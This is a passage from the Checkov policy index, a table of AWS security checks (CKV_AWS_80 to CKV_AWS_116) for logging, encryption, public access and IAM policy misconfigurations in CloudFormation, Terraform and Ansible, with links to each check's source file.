[MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) | -| 338 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | -| 339 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | -| 340 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | -| 341 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 342 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 343 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 344 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 345 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 346 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 347 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 348 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 349 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 350 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | -| 351 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | -| 352 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 353 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 354 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | -| 355 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | -| 356 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 357 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 358 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 359 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 360 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 361 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 362 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 363 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 364 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 365 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 366 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 367 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 368 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 369 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 372 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 373 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 374 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 375 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 376 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 377 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 378 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | -| 379 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | -| 380 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | -| 381 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 382 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 383 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | -| 384 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | -| 385 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 386 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 387 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 388 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 389 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 390 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 391 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | -| 392 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | -| 393 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 394 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 395 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | -| 396 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | -| 397 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | -| 398 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 399 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 400 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | -| 401 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | -| 402 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | -| 403 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | -| 404 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 405 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 406 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 407 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | -| 408 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | -| 409 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | -| 410 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | -| 411 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | -| 412 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 413 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 414 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 415 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 416 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 417 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | -| 418 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 419 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 420 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 421 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 422 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 423 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | -| 424 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 425 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 426 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 427 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 428 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 429 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | -| 430 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 431 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 432 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 433 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 434 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 435 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | -| 436 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 437 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 438 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 439 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 440 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 441 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | -| 442 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | -| 443 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | -| 444 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | -| 445 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 446 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 447 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 448 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 449 | CKV_AWS_116 | resource | AWS::Serverless::Function | 